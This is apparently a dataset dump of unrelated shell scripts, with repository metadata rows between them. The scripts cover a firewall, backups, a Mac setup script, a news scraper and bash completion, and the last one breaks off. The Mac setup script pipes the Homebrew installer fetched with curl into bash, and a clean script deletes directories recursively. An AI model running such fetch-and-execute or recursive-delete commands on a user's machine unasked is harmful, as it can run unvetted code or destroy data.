    # Mock up make_api_request as a failure.
    # When calling set_idp_adapter_mapping function, its
    # expected to fail when make_api_request fails to create idp adapter mapping.
    make_api_request() {
        return 1
    }

    set_idp_adapter_mapping > /dev/null 2>&1
    exit_code=$?
    assertEquals 1 ${exit_code}
}

testHappyPathCreateIdpMapping() {
    # Mock up make_api_request as a success for creating idp adapter mapping.
    make_api_request() {
        return 0
    }

    set_idp_adapter_mapping > /dev/null 2>&1
    exit_code=$?
    assertEquals 0 ${exit_code}
}

# load shunit
. ${SHUNIT_PATH}
| true
|
b6b5ab9063566430a75c44fa5f2fd92e55fb5551
|
Shell
|
nicrip/moos-ivp-rypkema
|
/clean.sh
|
UTF-8
| 693
| 2.75
| 3
|
[] |
no_license
|
#!/bin/bash
#--- simple clean script ---#

#remove all files in build directory
rm -rf ./build/*
#remove all files in lib directory
rm -rf ./lib/*
#remove all files in bin directory (except for original binaries)
find ./bin/ -mindepth 1 ! -name "MOOSup.py" ! -name "MyGenMOOSApp" ! -name "README_MOOSup.py" -delete
#remove all MOOSLog* folders
# (-exec rm -rf is used because find's -delete cannot remove non-empty dirs)
find ./ -mindepth 1 -name "MOOSLog*" -type d -exec rm -rfv {} \;
#remove all Log* folders
find ./ -mindepth 1 -name "LOG*" -type d -exec rm -rfv {} \;
#remove all files of type .LastOpenedMOOSLogDirectory
find ./ -mindepth 1 -name "*.LastOpenedMOOSLogDirectory" -delete
#remove all files of type .moos++
find ./ -mindepth 1 -name "*.moos++" -delete
| true
|
a5dcabf8cdad56182f1bf060d42c3378d809bbc0
|
Shell
|
ryuichiueda/kaigan_shellscript
|
/201301/LOGWATCH
|
UTF-8
| 495
| 3.484375
| 3
|
[] |
no_license
|
#!/bin/bash -vx
#
# LOGWATCH: collect the logwatch mails for the given host
# usage: ./LOGWATCH <hostname>
#
# written by R. Ueda (r-ueda@usp-lab.com)

# BUG FIX: the original `[ $1 = "" ]` is a test syntax error when no
# argument is supplied (the unquoted $1 vanishes); use -z on the quoted
# parameter instead.
[ -z "$1" ] && exit 1

server=$1
dir=/home/ueda/MAIL
dest="$dir/LOGWATCH_$server"

cd "$dir" || exit 1
mkdir -p "$dest" || exit 1

# List the mail files, keep those whose From: header matches the host,
# then copy each into the destination named by its 8-char date prefix.
echo ????????.utf8/* |
xargs grep -F "From: logwatch@$server" |
awk -F: '{print $1,substr($1,1,8)}' |
#1: filename  2: date
awk -v d="$dest" '{print $1,d "/" $2}' |
#1: copy source  2: copy destination
xargs -n 2 cp
| true
|
7a8e94b1abfc3e09708afcad35f86f598956e9ff
|
Shell
|
leojacoby/python
|
/shopping.py
|
UTF-8
| 1,375
| 3.484375
| 3
|
[] |
no_license
|
#!/usr/bin/env python
# shopping.py
#
#
# Created by Leo Jacoby on 8/21/16.
#
# Interactive shopping-list builder (Python 2: uses raw_input).
# NOTE: the shebang was previously #!/bin/sh, which cannot run this file.

shopping = []

def helper():
    # Print the usage instructions.
    print("""Add items to the list.
Seperate each item with a comma.
Type 'SHOW' to see your current list.
When you are done, type 'DONE' in all caps.
If you are confused about any of these comands, type 'HELP'.\n""")

def shower():
    # Print the list with 1-based numbering.
    count = 1
    for i in shopping:
        print("{}: {}".format(count, i))
        count += 1

def adder(x):
    # Append one item and report the new list size.
    shopping.append(x)
    print("You added {} to your list, which now has {} items.".format(x, len(shopping)))

helper()
while 1:
    current = raw_input("> ")
    if current == "DONE":
        print("Here's your list:")
        shower()
        break
    elif current == "SHOW":
        shower()
        continue
    elif current == "HELP":
        helper()
        continue
    else:
        new = current.split(',')
        index = raw_input("Add this at at a certain spot? Press enter for the end of the list, or give me a number. Currently {} items in list. ".format(len(shopping)))
        # BUG FIX: the insert/append logic used to sit inside an
        # `except ValueError:` handler wrapped around raw_input, which never
        # raises ValueError -- so entered items were silently discarded.
        # The ValueError guard belongs around int(index) instead.
        if index:
            try:
                spot = int(index) - 1
            except ValueError:
                # Non-numeric position: fall back to appending at the end.
                spot = len(shopping)
            for item in new:
                shopping.insert(spot, item.strip())
                spot += 1
        else:
            for item in new:
                shopping.append(item.strip())
| true
|
11b0504dd601c7b0436141f2625914d3109fc236
|
Shell
|
lobsterdore/terraform-vpn-example
|
/files/firewall-client.sh
|
UTF-8
| 991
| 2.65625
| 3
|
[] |
no_license
|
#!/bin/sh

# Client-side iptables policy for the VPN example: default-deny inbound,
# allow loopback and the VPN tunnel, track outbound connections.

# Drop everything and clear rules
iptables -P OUTPUT DROP
iptables -P INPUT DROP
iptables -P FORWARD DROP
iptables -F

# Allow outbound by default; drop inbound and forwarded traffic
iptables -P OUTPUT ACCEPT
iptables -P INPUT DROP
iptables -P FORWARD DROP

# Prevent external packets from using loopback addr
iptables -A INPUT -i eth0 -s 127.0.0.1 -j DROP
iptables -A FORWARD -i eth0 -s 127.0.0.1 -j DROP
iptables -A INPUT -i eth0 -d 127.0.0.1 -j DROP
iptables -A FORWARD -i eth0 -d 127.0.0.1 -j DROP

# Loopback
iptables -A INPUT -s 127.0.0.1 -j ACCEPT
iptables -A INPUT -d 127.0.0.1 -j ACCEPT

# Accept all via vpn
iptables -A INPUT -i tun+ -j ACCEPT
iptables -A FORWARD -i tun+ -j ACCEPT

# Keep state of connections from local machine and private subnets
iptables -A OUTPUT -m state --state NEW -o eth0 -j ACCEPT
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A FORWARD -m state --state NEW -o eth0 -j ACCEPT
# BUG FIX: the final rule was missing its "-j ACCEPT" target, making it a
# no-op match rule; established/related forwarded traffic was never accepted.
iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
| true
|
f4c59635f14a41fcde05d353aa8ac021fbf10820
|
Shell
|
ciccalab/sysSVM
|
/raw_scripts/data_parsing.sh
|
UTF-8
| 909
| 2.9375
| 3
|
[] |
no_license
|
#!/bin/sh
# SGE job wrapper: collect per-sample variant files from the command line
# and hand them to the OAC data_parsing.R script.
## Set the working Directorty to be the current one, i.e. where you are submitting the script
##$ -cwd
##$ -j y
## Set the SHELL type to be sh##
#$ -S /bin/sh
## Set the Parallel Environment (in this case mpi)
##$ -pe smp 1

# Flags: -s sample dir, -m SNVs, -i indels, -c CNVs, -t stats,
# -v SVs (accepted but currently unused), -g genome.
while getopts ':s:m:i:c:t:v:g:' flag; do
  case "${flag}" in
    s) sample_dir="${OPTARG}" ;;
    m) snvs="${OPTARG}" ;;
    i) indels="${OPTARG}" ;;
    c) cnvs="${OPTARG}" ;;
    t) stats="${OPTARG}" ;;
    ##v) svs="${OPTARG}" ;;
    g) genome="${OPTARG}" ;;
  esac
done

echo "Sample directory: ${sample_dir}"

## CONFIGURATION
## --------------
module load general/R/3.2.1
module load bioinformatics/bedtools2/2.25.0
Rscript='/mnt/lustre/users/k1469280/mourikisa/data/OAC/data_parsing.R'

## Run script
#Rscript $Rscript ${sample_dir} ${snvs} ${indels} ${cnvs} ${stats} ${svs} ${genome}
Rscript $Rscript ${sample_dir} ${snvs} ${indels} ${cnvs} ${stats} ${genome}
| true
|
83946e550cbc15480b22159b1d2392ce5e659041
|
Shell
|
Lianathanoj/dotfiles
|
/setup/setup1_mac.sh
|
UTF-8
| 2,644
| 4.125
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
###################################################################################################
# Description: This creates a local Github directory, downloads homebrew, downloads git, sets up
#              git credentials, and clones my dotfiles.
# Instructions: Navigate to https://github.com/Lianathanoj/dotfiles/setup/setup1.sh, download the
#               file, and run `bash setup1_mac.sh`. You'll need to intermittently type in certain
#               information such as password, Github credentials, etc. We need to do this in this
#               manner because some steps in setup2.sh require brew and git to be installed. This
#               script tries to be idempotent in that you can run it multiple times with the same
#               outcome.
###################################################################################################

# create Github directory if it doesn't already exist
GITHUB_DIR=$HOME/Github
mkdir -p $GITHUB_DIR

# download homebrew
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
# grep -qF guards make the PATH additions idempotent across reruns.
grep -qF 'eval "$(/opt/homebrew/bin/brew shellenv)"' $HOME/.zprofile || echo 'eval "$(/opt/homebrew/bin/brew shellenv)"' >> $HOME/.zprofile
grep -qF 'export PATH="/opt/homebrew/bin:$PATH"' $HOME/.zshrc || echo 'export PATH="/opt/homebrew/bin:$PATH"' >> $HOME/.zshrc

# download git, set up credentials, and start ssh agent
brew install git
git config --global user.name "Jonathan Lian"
git config --global user.email jonathan.lian123@gmail.com
ssh-keygen -t ed25519 -C "jonathan.lian123@gmail.com"
eval "$(ssh-agent -s)"

# create ssh config file if it doesn't already exist
SSH_CONFIG=$HOME/.ssh/config
if test -f "$SSH_CONFIG" ; then
    echo "~/.ssh/config exists."
else
    echo "~/.ssh/config does not exist; creating ~/.ssh/config file."
    touch "$SSH_CONFIG"
fi

# add ssh key to agent and store passphrase in keychain
# POTENTIAL TODO: add steps for grepping ~/.ssh/id_ABC if id_ed25519 is not generated
grep -qF '~/.ssh/id_ed25519' ~/.ssh/config || echo -e 'Host *\n\tAddKeysToAgent yes\n\tIdentityFile ~/.ssh/id_ed25519' >> ~/.ssh/config
ssh-add --apple-use-keychain ~/.ssh/id_ed25519

# manual step: the new key must be registered with Github before cloning over ssh below.
echo -e '\nYou will now need to add the SSH key to your Github account. Follow the instructions at https://docs.github.com/en/authentication/connecting-to-github-with-ssh/adding-a-new-ssh-key-to-your-github-account\n'
read -p 'Press any key to continue once you have added the SSH key to your Github account.' -n1 -s

# clone my dotfiles repo into the local Github directory
git clone git@github.com:Lianathanoj/dotfiles.git $GITHUB_DIR/dotfiles
bash $GITHUB_DIR/dotfiles/setup/setup2.sh
| true
|
0bc7e8c3618a68c4eda4910ca384081de9911826
|
Shell
|
pylipp/sdd
|
/completion/sdd
|
UTF-8
| 1,824
| 3.59375
| 4
|
[
"MIT"
] |
permissive
|
# sdd completion
#
# @author: Sergei Eremenko (https://github.com/SmartFinn)
# @license: MIT license (MIT)
# @link: https://github.com/pylipp/sdd

# Print the names of apps sdd can install, one per line (second
# whitespace-separated column of `sdd list --available`).
_sdd_list_available() {
    local app_name

    command -v sdd >/dev/null || return 1

    while read -r _ app_name; do
        [ -n "$app_name" ] || continue
        printf '%s\n' "$app_name"
    done < <(sdd list --available)

    return 0
}

# Print the names of installed apps, one per line (text before '=' in
# `sdd list --installed`).
_sdd_list_installed() {
    local app_name

    command -v sdd >/dev/null || return 1

    while IFS='=' read -r app_name _; do
        [ -n "$app_name" ] || continue
        printf '%s\n' "$app_name"
    done < <(sdd list --installed)

    return 0
}

# Bash completion entry point: completes subcommands, app names for
# install/uninstall/upgrade, and option flags for list.
_sdd_completion() {
    local cur prev word cword
    local -a words=()
    local -a opts=(
        install
        list
        uninstall
        upgrade
        -h --help
        -V --version
    )
    local -a list_opts=(
        -a --available
        -i --installed
        -u --upgradable
    )

    _init_completion || return

    # If a subcommand is already on the line, complete its argument.
    for word in "${words[@]}"; do
        case "$word" in
            install)
                COMPREPLY=( $(compgen -W "$(_sdd_list_available)" -- "$cur") )
                return 0
                ;;
            uninstall|upgrade)
                COMPREPLY=( $(compgen -W "$(_sdd_list_installed)" -- "$cur") )
                return 0
                ;;
        esac
    done

    case "$prev" in
        list)
            COMPREPLY=($(compgen -W "${list_opts[*]}" -- "$cur"))
            return 0
            ;;
        -h | --help | \
        -V | --version | \
        -a | --available | \
        -i | --installed | \
        -u | --upgradable)
            # stop completion if one of these option already specified
            return 0
            ;;
        *)
            COMPREPLY=($(compgen -W "${opts[*]}" -- "$cur"))
            return 0
            ;;
    esac
}

complete -F _sdd_completion sdd

# vim: filetype=sh sw=4 ts=4 et
| true
|
712390134792f55329f59f74f28ef706cc60964c
|
Shell
|
poftwaresatent/bktools
|
/backup-l2.sh
|
UTF-8
| 565
| 3.21875
| 3
|
[] |
no_license
|
#!/bin/sh

# Level-2 (incremental) backup: archive every file under $SRC changed since
# the newest level-1 stamp file, writing a stamp, a table of contents (.toc)
# and a tar alongside.

HOST=ide10190
# NOTE: SRC and FILTER are intentionally unquoted at their use sites so
# they word-split into multiple find/fgrep arguments.
SRC="/rolo /Users/rolphi"
FILTER='-e .DS_Store -e /rolo/tmp -e /Users/rolphi/Library/Logs -e /Users/rolphi/Library/Developer/Shared/Documentation -e /Users/rolphi/Library/Caches'

# find level 1 stamp file (ls -t sorts newest first)
L1STAMP=`ls -t $HOST-l1-*.stamp | head -n 1`
if [ -z "$L1STAMP" ]; then
    echo "ERROR no level 1 stamp file found"
    exit 2
fi

# level 2: stamp now, then tar everything newer than the level-1 stamp;
# tee records the file list into the .toc.
STAMP=`date +'%F_%H-%M-%S_%z'`
touch $HOST-l2-$STAMP.stamp
find $SRC -type f -newer $L1STAMP | fgrep -v $FILTER | tee $HOST-l2-$STAMP.toc | tar -v -c -f $HOST-l2-$STAMP.tar -T /dev/stdin
| true
|
a10bc62a09c6d641b2439ca05f28e42a66882486
|
Shell
|
jerinshajit97/bash_scripts
|
/Sec_News24x7/secnews24x7.sh
|
UTF-8
| 1,031
| 3.46875
| 3
|
[] |
no_license
|
#!/bin/bash

# Scrape thehackernews.com: collect the headlines plus the first ~20 text
# lines of each linked story into secnews.txt.

echo "*********Running SEC NEWS 24x7***********"
echo "[+] clearing previous fetch"
echo "SEC NEWS 24x7 updated on $(date)" > secnews.txt
echo "[+] fetching hot news "
echo "[+] fetching headlines "
# Headlines sit in <h2> tags; strip all markup.
curl https://thehackernews.com/ | grep "</h2>" | sed -e 's/<[^>]*>//g' > news.txt
# Collect the per-story URLs in document order.
link=$(curl https://thehackernews.com/ | grep "'story-link'" | grep -Eo "(http|https)://[a-zA-Z0-9./?=_%:-]*")
i=0
for var in $link
do
    url[$i]=$var
    ((i=i+1))
done
j=0
# Pair headline N with URL N; fetch each article body with scripts removed,
# tags stripped, blank lines dropped, and only the first 20 lines kept.
while IFS= read -r line; do
    echo "**********************************************$line*******************************************************" >> secnews.txt
    echo "[+] fetching more details "
    curl ${url[$j]} | sed '/<script/,/<\/script>/d' | sed -e 's/<[^>]*>//g' | sed '/^$/d' | head -n 20 >> secnews.txt
    ((j=j+1))
    printf "\n\n\n" >> secnews.txt
done < news.txt
echo "[+] removing tmp files "
rm news.txt
echo "[+] creating the file "
echo "[+] news saved in secnews.txt"
#cat secnews.txt
echo "[+] Process completed.Amigo!!! Its time to get some sleep"
| true
|
9fc5efa0d8057f93e5964df6ac230be6da2deb3e
|
Shell
|
mjamesruggiero/dotfiles
|
/merge_csvs.sh
|
UTF-8
| 511
| 3.96875
| 4
|
[] |
no_license
|
#!/bin/bash
# munge a series of CSVs into one big CSV
# takes the name of what will be the concatenated CSV
OUT_FILE_NAME=$1
i=0
for FILE_NAME in ./*.csv; do
if [ "$FILE_NAME" != "$OUT_FILE_NAME" ] ;
then
# echo "about to concat $FILE_NAME"
if [[ $i -eq 0 ]] ; then
head -1 $FILE_NAME > $OUT_FILE_NAME
fi
tail -n +2 $FILE_NAME >> $OUT_FILE_NAME # append from 2nd line of file
i=$(( $i + 1 )) # increment
fi
done
| true
|
c32486ff3b602549071d256c2c3bbc7208f9ffe5
|
Shell
|
dpitic/apue
|
/clang-config.sh
|
UTF-8
| 643
| 3.25
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
#
# File: clang-config.sh
# Author: dpitic
#
# Created on 29/01/2018, 8:44:05 AM
#
# Configures the .clang_complete file based on system type.
#
case `./systype.sh` in
"freebsd")
cp .clang_complete.freebsd .clang_complete
cp .clang_complete.freebsd .clang
;;
"openbsd")
cp .clang_complete.openbsd .clang_complete
cp .clang_complete.openbsd .clang
;;
"linux")
cp .clang_complete.linux .clang_complete
cp .clang_complete.linux .clang
;;
"macos")
cp .clang_complete.macos .clang_complete
cp .clang_complete.macos .clang
;;
*)
echo "Unknown platform" >&2
exit 1
esac
| true
|
0f31832b1c17079e89e37d90458d4f4e99a7b661
|
Shell
|
hortonworks/cloudbreak
|
/performance-test/perftest.sh
|
UTF-8
| 1,129
| 2.6875
| 3
|
[
"LicenseRef-scancode-warranty-disclaimer",
"ANTLR-PD",
"CDDL-1.0",
"bzip2-1.0.6",
"Zlib",
"BSD-3-Clause",
"MIT",
"EPL-1.0",
"LicenseRef-scancode-proprietary-license",
"LicenseRef-scancode-jdbm-1.00",
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
#!/bin/bash
: ${CB_PERFTEST_HOST:=192.168.99.100}
: ${CB_MOCK_HOST:="mockhosts"}
: ${CB_USERNAME:=admin@example.com}
: ${CB_PASSWORD:=cloudbreak}
: ${CB_NUMBER_OF_USERS:=1}
: ${CB_RAMPUP_SECONDS:=3}
: ${CB_DELAY_BEFORE_TERM:=60}
echo "[!!] Make sure you spinned up the mock server: CB_SERVER_ADDRESS=$CB_PERFTEST_HOST MOCK_SERVER_ADDRESS=$CB_MOCK_HOST gradle :integration-test:runMockServer"
echo "[!!] \$CB_MOCK_HOST ($CB_MOCK_HOST) must be resolvable from the running Cloudbreak backend"
echo "[!!] User \$CB_USERNAME ($CB_USERNAME) must exists in uaa database with password \$CB_PASSWORD ($CB_PASSWORD)"
docker run -it --rm \
-v `pwd`/conf:/opt/gatling/conf \
-v `pwd`/user-files:/opt/gatling/user-files \
-v `pwd`/results:/opt/gatling/results \
-e CB_PERFTEST_HOST=$CB_PERFTEST_HOST \
-e CB_MOCK_HOST=$CB_MOCK_HOST \
-e CB_NUMBER_OF_USERS=$CB_NUMBER_OF_USERS \
-e CB_RAMPUP_SECONDS=$CB_RAMPUP_SECONDS \
-e CB_DELAY_BEFORE_TERM=$CB_DELAY_BEFORE_TERM \
-e CB_USERNAME=$CB_USERNAME \
-e CB_PASSWORD=$CB_PASSWORD \
-e CB_HOSTNAME_ALIASES=$CB_HOSTNAME_ALIASES \
docker-private.infra.cloudera.com/cloudera_thirdparty/denvazh/gatling:2.3.1
| true
|
7c0b45a7abc6c63d42f349d7375439eee685c6fb
|
Shell
|
delkyd/alfheim_linux-PKGBUILDS
|
/lib32-libmumble/PKGBUILD
|
UTF-8
| 1,751
| 2.640625
| 3
|
[] |
no_license
|
# shellcheck shell=bash
# shellcheck disable=SC2034,SC2148,SC2154
# Maintainer: Zeke Sonxx <zeke@zekesonxx.com>
# Contributer: Matjaz Mozetic <rationalperseus@gmail.com>
# Contributor: Jan Alexander Steffens (heftig) <jan.steffens@gmail.com>
# Contributor: Sven-Hendrik Haase <sh@lutzhaase.com>
# Contributor: Lauri Niskanen <ape@ape3000.com>
# Contributor: Sebastian.Salich@gmx.de
# Contributor: Doc Angelo
# Based both on the community/mumble package and the old lib32-libmumble package.
# https://git.archlinux.org/svntogit/community.git/tree/trunk/PKGBUILD?h=packages/mumble
# http://pkgbuild.com/git/aur-mirror.git/tree/lib32-libmumble/PKGBUILD
pkgname=lib32-libmumble
pkgver=1.2.18
pkgrel=1
arch=('x86_64')
pkgdesc="A voice chat application similar to TeamSpeak (32-bit overlay library)"
license=('BSD')
depends=("mumble=$pkgver" 'lib32-libgl')
makedepends=('boost' 'mesa' 'gcc-multilib')
url="http://mumble.sourceforge.net/"
source=("https://github.com/mumble-voip/mumble/releases/download/${pkgver}/mumble-${pkgver}.tar.gz")
md5sums=('3c448632142e0f38e693250965e8b6b1')
sha512sums=('bd8b10cb34733d566fd6aae2410e8fe5f098efe5c5b106f569112d4e5205d8a045d43a0adc02a7a9d3e16b15e3515d908784596f293a7e2972fba20830161074')
build() {
cd "$srcdir/mumble-$pkgver/overlay_gl" || exit
qmake-qt4 overlay_gl.pro QMAKE_CFLAGS+="-m32" QMAKE_LFLAGS+="-m32"
make
}
package() {
cd "$srcdir/mumble-$pkgver" || exit
# lib stuff
install -m755 -D "./release/libmumble.so.$pkgver" "$pkgdir/usr/lib32/mumble/libmumble.so.$pkgver"
ln -s "libmumble.so.$pkgver" "$pkgdir/usr/lib32/mumble/libmumble.so"
ln -s "libmumble.so.$pkgver" "$pkgdir/usr/lib32/mumble/libmumble.so.1"
ln -s "libmumble.so.$pkgver" "$pkgdir/usr/lib32/mumble/libmumble.so.1.2"
# license
install -d "$pkgdir/usr/share/licenses"
ln -s "/usr/share/licenses/mumble" "$pkgdir/usr/share/licenses/$pkgname"
}
| true
|
41bd2b7fd6f420f41d66866c21d9df26ec3a7ce4
|
Shell
|
aur-archive/checksums
|
/PKGBUILD
|
UTF-8
| 680
| 2.546875
| 3
|
[] |
no_license
|
# Contributor: Mladen Pejakovic <pejakm@gmail.com>
pkgname=checksums
pkgver=0.4
pkgrel=2
pkgdesc="Service menu and a small script for calculation of md5, sha1 and sha256 checksums. Based on KonqCheckSum service menu"
url="http://kde-look.org/content/show.php/KonqCheckSum?content=83460"
depends=('kdebase-workspace')
optdepends=()
options=()
license=('GPL')
arch=('any')
source=(checksums.desktop
checksums.sh)
md5sums=('94b14c8139ab72700638edf53b9354d7'
'f23f7ff8d8bc527bc08741c5da0f12bd')
build() {
cd ${srcdir}
install -D -m 755 checksums.sh ${pkgdir}/usr/bin/checksums.sh
install -D -m 755 checksums.desktop ${pkgdir}/usr/share/kde4/services/ServiceMenus/checksums.desktop
}
| true
|
01c3cb082789b51d99737231a5b52fbb379f9590
|
Shell
|
cl-/realtimeTicTac_mobile
|
/auto_restart_nodejs_server.min.UNIX.sh
|
UTF-8
| 729
| 3.515625
| 4
|
[] |
no_license
|
#!/bin/sh
while read userInput
do
echo To stop this script, press Ctrl-C.
echo To make this script do nothing, enter any non-empty value and press enter.
## test -n gives True if the length of string is non-zero --> 1st True leads to checking "break/continue" and executing it
test -n "$userInput" && continue
#kill all node instances before starting a new one
## killall node
##### ##### ##### pkill node
#use backtick (`) symbol so that node terminates itself when this script is terminated
`node sharedThingsServer.js` #so as to prevent node from running invisibly, which causes "Error: listen EADDRINUSE"
# Get PID of the previous command launched in this bash script
## PID = $!
## echo $PID
done
| true
|
ad3d58a9cd0c67656628d67d5912a102f58114ac
|
Shell
|
hapebe/linux-itw
|
/local-mail/mail-proc.sh
|
UTF-8
| 741
| 3.5625
| 4
|
[] |
no_license
|
#!/bin/bash
#
# this is intended to complement an entry in /etc/aliases:
# "myprocessor: |/home/hapebe/...../mail-proc.sh"
#
# remember to run "newaliases" after modyfying that config file!
# newaliases was originally part of sendmail, but postfix (and
# probably other MTAs) provides a compatibility layer for this.
#
SCRIPT=$(readlink -f $0)
SCRIPTPATH=`dirname $SCRIPT`
LOGFILE=${SCRIPTPATH}/mail-proc.log
echo "This script ($0) has been called with $# parameters." >> $LOGFILE
for param in $@ ; do
echo "Parameter: $param" >> $LOGFILE
done
echo "--- end of params" >> $LOGFILE
echo "" >> $LOGFILE
echo "STDIN:" >> $LOGFILE
while read line ; do
echo $line >> $LOGFILE
done
echo "--- end of STDIN" >> $LOGFILE
echo "" >> $LOGFILE
| true
|
b7fb755ac8ff05e85496958d23d079348f6a0699
|
Shell
|
tjoskar/dotfiles
|
/home/bin/git-fyzzy-checkout
|
UTF-8
| 386
| 3.671875
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
# Use fzf to checkout a branch
# Check if it's a git repo
[[ $(git root 2>&1) == 'Not a git repo!' ]] && echo "Not a git repo!" && exit 1
branches=$(git branch --all) &&
branch=$(echo "$branches" |
fzf-tmux --cycle --height=50% --reverse -d $((2 + $(wc -l <<<"$branches"))) +m) &&
git checkout $(echo "$branch" | sed "s/.* //" | sed "s#remotes/[^/]*/##")
| true
|
83c222ecdf000b6274b7e0136525f2fa9ecb838b
|
Shell
|
mntech/pascalDD
|
/agora-java/tools/log_error_check.sh
|
UTF-8
| 409
| 3.484375
| 3
|
[] |
no_license
|
#!/bin/sh
# Basic script to check the main scraper log for errors (timeouts, etc)
MAILTO=jbalint@gmail.com
LOGFILE=`/bin/ls -tr runlogs/run-*.log | tail -1`
echo "Log file is $LOGFILE"
ERRORS=`grep -n -A 0 ERROR $LOGFILE | grep -v 'content type is not an image:' | grep -v 'invalid curl result:'`
if [ "$ERRORS" != "" ] ; then
echo "Mailing"
echo "$ERRORS" | mail -s "Scraper Errors in $LOGFILE" $MAILTO
fi
| true
|
745d422ae7228997fcfe74ed1b93af777bc20193
|
Shell
|
chadrien/homebrew-formulas
|
/contrib/generate.sh
|
UTF-8
| 213
| 3.265625
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
set -xe
CONTRIB_DIR=$(dirname $0)
export FORMULA_DIR=$(dirname $CONTRIB_DIR)/Formula
mkdir -p ${FORMULA_DIR}
for file in $(find ${CONTRIB_DIR}/generators -type f); do
bash -xe $file
done
| true
|
82a4225d15da7806be7153885430e42d1a0e4777
|
Shell
|
virtualstaticvoid/asdf-sonarscanner
|
/bin/install
|
UTF-8
| 1,186
| 4.125
| 4
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
set -e
set -o pipefail
# set -x
ASDF_INSTALL_TYPE=${ASDF_INSTALL_TYPE:-version}
[ -n "$ASDF_INSTALL_VERSION" ] || (>&2 echo 'Missing ASDF_INSTALL_VERSION' && exit 1)
[ -n "$ASDF_INSTALL_PATH" ] || (>&2 echo 'Missing ASDF_INSTALL_PATH' && exit 1)
install_plugin() {
local install_type=$1
local version=$2
local install_path=$3
local download_url="$(get_download_url $install_type $version)"
local tmp_download=$(mktemp -d)
echo "Downloading sonar-scanner-cli from $download_url"
pushd $tmp_download > /dev/null
curl -L -s "$download_url" -o "download.zip"
unzip "download.zip" > /dev/null || exit 1
pushd "sonar-scanner-${version}-$(get_platform)" > /dev/null
cp -r . $install_path
popd > /dev/null
popd > /dev/null
rm -rf $tmp_download > /dev/null
}
get_platform() {
[ "Linux" = "$(uname)" ] && echo "linux" || echo "macosx"
}
get_download_url() {
local install_type=$1
local version=$2
local platform=$(get_platform)
echo "https://binaries.sonarsource.com/Distribution/sonar-scanner-cli/sonar-scanner-cli-${version}-${platform}.zip"
}
install_plugin "$ASDF_INSTALL_TYPE" "$ASDF_INSTALL_VERSION" "$ASDF_INSTALL_PATH"
| true
|
6dafa2ec5a5ed6da6f22256455a7aabbb030ec9e
|
Shell
|
XrosLiang/climlab
|
/conda-recipe/build.sh
|
UTF-8
| 1,055
| 3.09375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Based on conda-forge recipe for scipy
export LIBRARY_PATH="${PREFIX}/lib"
export C_INCLUDE_PATH="${PREFIX}/include"
export CPLUS_INCLUDE_PATH="${PREFIX}/include"
# Depending on our platform, shared libraries end with either .so or .dylib
if [[ `uname` == 'Darwin' ]]; then
# Also, included a workaround so that `-stdlib=c++` doesn't go to
# `gfortran` and cause problems.
#
# https://github.com/conda-forge/toolchain-feedstock/pull/8export CFLAGS="${CFLAGS} -stdlib=libc++ -lc++"
export CFLAGS="${CFLAGS} -stdlib=libc++ -lc++"
export LDFLAGS="-headerpad_max_install_names -undefined dynamic_lookup -bundle -Wl,-search_paths_first -lc++"
# conda compilers need the MacOSX10.9 SDK and need to be told where they are
# https://www.anaconda.com/utilizing-the-new-compilers-in-anaconda-distribution-5/
# Other uses may need to update this if they install MacOSX10.9.sdk somewhere else
export CONDA_BUILD_SYSROOT=$HOME/opt/MacOSX10.9.sdk
else
unset LDFLAGS
fi
$PYTHON -m pip install . --no-deps -vv
| true
|
357b7213266f158ce8ce586ed473679bf1f7c561
|
Shell
|
joshua-rutherford/gm-fabric-dashboard
|
/public/setPath.sh
|
UTF-8
| 1,979
| 4.34375
| 4
|
[] |
no_license
|
#!/bin/bash
# A script to set the template string __BASE_URL__
# Capture path of JS Bundle
pattern="static/js/main.*.js"
JS_BUNDLE=( $pattern )
echo $JS_BUNDLE
# Quit if the parameter is empty
[[ -z "$1" ]] && { echo "No path was entered." ; exit 1; }
# If parameter is undo, ask for confirmation and restore backup.
if [ "$1" == "undo" ]; then
echo "It looks like you want to revert to a clean backup"
read -p "Are you sure? " -n 1 -r
echo # (optional) move to a new line
if [[ $REPLY =~ ^[Yy]$ ]]; then
cp -rf index.html.old index.html
cp -rf $JS_BUNDLE.old $JS_BUNDLE
fi
exit 1
fi
echo "{$1}"
if [[ $1 != */gmadmin/ ]]
then
echo 'Your path does not terminate in /gmadmin/'
echo 'This path MUST terminate in /gmadmin/ to properly infer the absolute paths'
echo 'of the metrics to scrape. The app uses a RegExp to replace /gmadmin/ with the following:'
echo 'For JVM, /admin/metrics.json and /admin/threads'
echo 'For Golang, /admin/metrics'
exit 1
else
BASEURL=$(printf "%q" "$1")
echo 'It looks like you want to deploy the dashboard to' $BASEURL
echo 'The app uses a RegExp to replace /gmadmin/ with the following:'
echo 'For JVM, /admin/metrics.json and /admin/threads'
echo 'For Golang, /admin/metrics'
fi
# Check to make sure argument exists. Quit otherwise.
read -p "Are you sure? " -n 1 -r
echo # (optional) move to a new line
if [[ $REPLY =~ ^[Yy]$ ]]
then
# If the backup doesn't exist, copy the index just in case
if [ -f './index.html.old' ]; then
echo 'Backup already detected.'
else
echo 'Backing up clean index.html'
cp -rf index.html index.html.old
cp -rf $JS_BUNDLE $JS_BUNDLE.old
fi
# Filter the old index, writing to index.html
echo 'Changing __BASE_URL__ to' $BASEURL
cat index.html.old | sed -E 's%__BASE_URL__[/]?%'$BASEURL'%g' >index.html
cat $JS_BUNDLE.old | sed -E 's%__BASE_URL__[/]?%'$BASEURL'%g' >$JS_BUNDLE
fi
| true
|
260a1297ab17b82a9f47dd77119fbc095dea54f2
|
Shell
|
wenliangz/slideslicer
|
/scripts/makesets.sh
|
UTF-8
| 1,642
| 3.078125
| 3
|
[
"BSD-2-Clause"
] |
permissive
|
CLASSES=(infl normal)
#DATADIR=../data/data_1024/infl_split/
#DATADIR=/repos/data/data_128_subsample_8x/fullsplit/
#CLASSES=(glom normal)
#DATADIR=../data/data_1024/glom_split/
DATADIR="$1"
cd $DATADIR;
DATADIR=$(pwd -P)
cd -
echo "CLASSES:"
